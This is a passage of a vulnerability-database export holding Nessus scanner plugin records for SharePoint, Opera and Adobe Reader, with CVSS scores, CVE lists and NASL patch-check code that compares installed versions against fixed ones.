make_list(\n '5001944'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nvar windir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\nvar install = get_single_install(app_name:app_name);\nvar kb_checks =\n{\n '2019':\n { '0':\n {'Server':\n [\n {\n 'kb' : '5001944',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'ascalc.dll',\n 'version' : '16.0.10375.20000',\n 'product_name' : 'Microsoft SharePoint Server 2019 Core'\n }\n ]\n }\n }\n};\n\n# Get the specific product / path\nvar param_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_HOST_NOT, 'affected');\nvar port = kb_smb_transport();\n# grab the path otherwise\nvar are_we_vuln = FALSE;\nvar vuln = FALSE;\nforeach check (param_list)\n{\n if (!isnull(check['version']))\n {\n var path = check['path'];\n if (!empty_or_null(check['append']))\n path = hotfix_append_path(path:check['path'], value:check['append']);\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n var report = '\\n';\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER) vuln = TRUE;\n\n}\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_INST_VER_NOT_VULN, app_name);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:25:35", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2016 < 16.0.5173.1000 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31948", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112931", "href": "https://www.tenable.com/plugins/was/112931", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:25:34", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2013 < 15.0.5353.1000 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31948", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112930", "href": "https://www.tenable.com/plugins/was/112930", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:25:35", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2019 < 16.0.10375.20000 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31948", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112929", "href": "https://www.tenable.com/plugins/was/112929", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:38", "description": "This update for opera fixes the following issues :\n\nUpdate to version 76.0.4017.94\n\n - released on the stable branch\n\nUpdate to version 76.0.4017.88\n\n - CHR-8404 Update chromium on desktop-stable-90-4017 to 90.0.4430.85\n\n - DNA-92219 Add bookmark API supports to the front-end\n\n - DNA-92409 [MAC] ‘Present now’ options windows appear behind detached window\n\n - DNA-92615 Capture tab from the tab context menu\n\n - DNA-92616 Capture tab from Snapshot\n\n - DNA-92617 Capture tab from image context menu\n\n - DNA-92652 Opera 76 translations\n\n - DNA-92680 Make image selector on any page work like bookmarks popup WP2\n\n - DNA-92707 Crash at void base::ObserverList::AddObserver(class content::PrerenderHost::Observer*)\n\n - DNA-92710 Autoupdate on macOS 11.3 not working\n\n - DNA-92711 Make image selector on any page work like bookmarks popup WP3\n\n - DNA-92730 Make image selector on any page work like bookmarks popup WP4\n\n - DNA-92761 Make image selector on any page work like bookmarks popup WP5\n\n - DNA-92776 Make image selector on any page work like bookmarks popup WP6\n\n - DNA-92862 Make “View pinboards” button work\n\n - DNA-92906 Provide in-house translations for Cashback strings to Spanish\n\n - DNA-92908 API collides with oneclick installer\n\n - The update to chromium 90.0.4430.85 fixes following issues :\n\n - CVE-2021-21222, CVE-2021-21223, CVE-2021-21224, CVE-2021-21225, CVE-2021-21226\n\n - Complete Opera 76.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-76/\n\nUpdate to version 75.0.3969.218\n\n - CHR-8393 Update chromium on desktop-stable-89-3969 to 89.0.4389.128\n\n - DNA-92113 Windows debug fails to compile opera_components/ipfs/ipfs/ipfs_url_loader_throttle.obj\n\n - DNA-92198 [Arm] Update signing scripts\n\n - DNA-92200 [Arm] Create universal packages from two buildsets\n\n - DNA-92338 [Search tabs] The preview isn’t updated when the tab from another window is closed\n\n - DNA-92410 [Download popup] Selected item still looks bad in dark mode\n\n - DNA-92441 Compilation error\n\n - DNA-92514 Allow to generate universal DMG package from existing universal .tar.xz\n\n - DNA-92608 Opera 75 crash during rapid workspace switching\n\n - DNA-92627 Crash at automation::Error::code()\n\n - DNA-92630 Crash at opera::PremiumExtensionPersistentPrefStorageImpl::IsPrem iumExtensionFeatureEnabled()\n\n - DNA-92648 Amazon icon disappears from Sidebar Extensions section after pressing Hide Amazon button\n\n - DNA-92681 Add missing string in Japanese\n\n - DNA-92684 Fix issues with signing multiple bsids\n\n - DNA-92706 Update repack generation from universal packages\n\n - DNA-92725 Enable IPFS for all channels\n\n - The update to chromium 89.0.4389.128 fixes following issues: CVE-2021-21206, CVE-2021-21220", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-06-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2021-712)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-712.NASL", "href": "https://www.tenable.com/plugins/nessus/150103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-712.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(150103);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2021-712)\");\n script_summary(english:\"Check for the openSUSE-2021-712 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for opera fixes the following issues :\n\nUpdate to version 76.0.4017.94\n\n - released on the stable branch\n\nUpdate to version 76.0.4017.88\n\n - CHR-8404 Update chromium on desktop-stable-90-4017 to\n 90.0.4430.85\n\n - DNA-92219 Add bookmark API supports to the front-end\n\n - DNA-92409 [MAC] ‘Present now’ options\n windows appear behind detached window\n\n - DNA-92615 Capture tab from the tab context menu\n\n - DNA-92616 Capture tab from Snapshot\n\n - DNA-92617 Capture tab from image context menu\n\n - DNA-92652 Opera 76 translations\n\n - DNA-92680 Make image selector on any page work like\n bookmarks popup WP2\n\n - DNA-92707 Crash at void\n base::ObserverList::AddObserver(class\n content::PrerenderHost::Observer*)\n\n - DNA-92710 Autoupdate on macOS 11.3 not working\n\n - DNA-92711 Make image selector on any page work like\n bookmarks popup WP3\n\n - DNA-92730 Make image selector on any page work like\n bookmarks popup WP4\n\n - DNA-92761 Make image selector on any page work like\n bookmarks popup WP5\n\n - DNA-92776 Make image selector on any page work like\n bookmarks popup WP6\n\n - DNA-92862 Make “View pinboards” button work\n\n - DNA-92906 Provide in-house translations for Cashback\n strings to Spanish\n\n - DNA-92908 API collides with oneclick installer\n\n - The update to chromium 90.0.4430.85 fixes following\n issues :\n\n - CVE-2021-21222, CVE-2021-21223, CVE-2021-21224,\n CVE-2021-21225, CVE-2021-21226\n\n - Complete Opera 76.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-76/\n\nUpdate to version 75.0.3969.218\n\n - CHR-8393 Update chromium on desktop-stable-89-3969 to\n 89.0.4389.128\n\n - DNA-92113 Windows debug fails to compile\n opera_components/ipfs/ipfs/ipfs_url_loader_throttle.obj\n\n - DNA-92198 [Arm] Update signing scripts\n\n - DNA-92200 [Arm] Create universal packages from two\n buildsets\n\n - DNA-92338 [Search tabs] The preview isn’t updated\n when the tab from another window is closed\n\n - DNA-92410 [Download popup] Selected item still looks bad\n in dark mode\n\n - DNA-92441 Compilation error\n\n - DNA-92514 Allow to generate universal DMG package from\n existing universal .tar.xz\n\n - DNA-92608 Opera 75 crash during rapid workspace\n switching\n\n - DNA-92627 Crash at automation::Error::code()\n\n - DNA-92630 Crash at\n opera::PremiumExtensionPersistentPrefStorageImpl::IsPrem\n iumExtensionFeatureEnabled()\n\n - DNA-92648 Amazon icon disappears from Sidebar Extensions\n section after pressing Hide Amazon button\n\n - DNA-92681 Add missing string in Japanese\n\n - DNA-92684 Fix issues with signing multiple bsids\n\n - DNA-92706 Update repack generation from universal\n packages\n\n - DNA-92725 Enable IPFS for all channels\n\n - The update to chromium 89.0.4389.128 fixes following\n issues: CVE-2021-21206, CVE-2021-21220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.opera.com/desktop/changelog-for-76/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"opera-76.0.4017.94-lp152.2.43.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:56", "description": "The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20149. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOS_ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149378", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149378);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20149. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30194 / 2020.001.30020 / 2021.001.20149 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Reader');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20149', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:18", "description": "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-06-09T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149379", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149379);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/09\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n 